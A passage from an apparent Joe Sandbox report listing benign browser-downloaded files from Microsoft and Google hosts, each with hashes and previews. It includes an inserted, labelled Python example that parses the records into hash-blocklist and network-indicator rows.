Preview:CgkKBw2/5iXyGgA=
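The records above list each dropped or downloaded file as one "Key:Value" field per line, a new record starting at every "Process:" line. The following Python script is an added example, not part of the Joe Sandbox report: it parses that layout into dictionaries, sanity-checks the digest lengths, and pulls out the rows an analyst would act on (SHA-256 values to blocklist, and URL/hash pairs as network indicators). The first sample record is copied from this section with the report's own hashes; the second is constructed with placeholder hashes so that a Malicious:true record is exercised. The selection rules in triage() are this example's own choices, not the sandbox's verdict logic.

```python
"""Turn Joe Sandbox 'dropped/downloaded file' records into triage rows.

Added example, not part of the Joe Sandbox report. It parses the record
layout shown in this section: one 'Key:Value' field per line, a new record
beginning at each 'Process:' line. Field names are those the report prints;
the selection rules in triage() are this example's own.
"""
import re

# Constructed input: the first record is copied from this report section
# (its hashes are the report's own); the second is invented with placeholder
# hashes so that a Malicious:true record is exercised.
SAMPLE = """\
Process:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
File Type:ASCII text, with no line terminators
Category:downloaded
Size (bytes):16
Entropy (8bit):3.875
Encrypted:false
SSDEEP:3:HMB:k
MD5:0B04EA412F8FC88B51398B1CBF38110E
SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:false
URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:CgkKBw2/5iXyGgA=
Process:C:\\Users\\user\\AppData\\Local\\Temp\\dropper.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):7.91
Encrypted:false
SSDEEP:96:placeholder:placeholder
MD5:0123456789ABCDEF0123456789ABCDEF
SHA1:0123456789ABCDEF0123456789ABCDEF01234567
SHA-256:0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
SHA-512:0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
Malicious:true
Preview:MZ......
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}
HEX = re.compile(r"^[0-9A-Fa-f]+$")


def parse_records(text):
    """Split the listing into dicts; a 'Process:' line starts a new record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()              # the HTML export pads lines with spaces
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)  # URLs, paths and previews contain ':'
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def validate(record):
    """Return the problems found in one record (an empty list means clean)."""
    problems = []
    for name, length in HASH_LEN.items():
        value = record.get(name, "")
        if len(value) != length or not HEX.match(value):
            problems.append(f"{name} is not a {length}-hex-digit digest")
    try:
        if int(record.get("Size (bytes)", "")) < 0:
            problems.append("negative size")
    except ValueError:
        problems.append("Size (bytes) is not an integer")
    return problems


def triage(records):
    """Pick the rows worth acting on.

    Rules (this example's own): a record flagged Malicious, or any dropped PE
    file, becomes a blocklist candidate; every 'downloaded' record with a URL
    becomes a network indicator regardless of verdict, because the fetch
    itself is the observation.
    """
    blocklist, network = [], []
    for r in records:
        malicious = r.get("Malicious", "").lower() == "true"
        is_pe = r.get("File Type", "").startswith("PE32")
        if malicious or (is_pe and r.get("Category") == "dropped"):
            blocklist.append(r["SHA-256"])
        if r.get("Category") == "downloaded" and "URL" in r:
            network.append((r["URL"], r["SHA-256"]))
    return {"blocklist": blocklist, "network": network}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r["SHA-256"], validate(r) or "ok")
    print(triage(recs))
```

Feed the whole "Dropped Files" section of a report to parse_records() instead of SAMPLE to get the same rows for every entry; records whose validate() output is non-empty usually indicate a copy-paste or extraction error rather than a sandbox bug, and should be re-checked against the original report before the digest goes into a blocklist.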
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):207935
                                                                                                                                                                                            Entropy (8bit):5.420780972514107
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                            MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                            SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                            SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                            SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):27868
                                                                                                                                                                                            Entropy (8bit):5.155680085584642
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                            MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                            SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                            SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                            SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):207935
                                                                                                                                                                                            Entropy (8bit):5.420780972514107
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                            MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                            SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                            SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                            SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):27868
                                                                                                                                                                                            Entropy (8bit):5.155680085584642
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                            MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                            SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                            SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                            SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):464328
                                                                                                                                                                                            Entropy (8bit):5.0747157240281755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
                                                                                                                                                                                            MD5:875E7F3672FEC41DDB5A2386D2331531
                                                                                                                                                                                            SHA1:282979933E99BDE3A6342DC1EF93FBC51682F2C3
                                                                                                                                                                                            SHA-256:F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
                                                                                                                                                                                            SHA-512:67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
                                                                                                                                                                                            Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
Category:dropped
Size (bytes):52717
Entropy (8bit):5.462668685745912
Encrypted:false
SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:413FCC759CC19821B61B6941808B29B5
SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:false
Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):72
Entropy (8bit):4.241202481433726
Encrypted:false
SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:9E576E34B18E986347909C29AE6A82C6
SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:false
Preview:{"Message":"The requested resource does not support http method 'GET'."}

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (52717), with no line terminators
Category:downloaded
Size (bytes):52717
Entropy (8bit):5.462668685745912
Encrypted:false
SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:413FCC759CC19821B61B6941808B29B5
SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:false
URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:downloaded
Size (bytes):1173007
Entropy (8bit):5.503893944397598
Encrypted:false
SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:2E00D51C98DBB338E81054F240E1DEB2
SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:false
URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (46884)
Category:dropped
Size (bytes):1817143
Entropy (8bit):5.501007973622959
Encrypted:false
SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:F57E274AE8E8889C7516D3E53E3EB026
SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:false
Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):13339
Entropy (8bit):7.683569563478597
Encrypted:false
SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:512625CF8F40021445D74253DC7C28C0
SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:downloaded
Size (bytes):17174
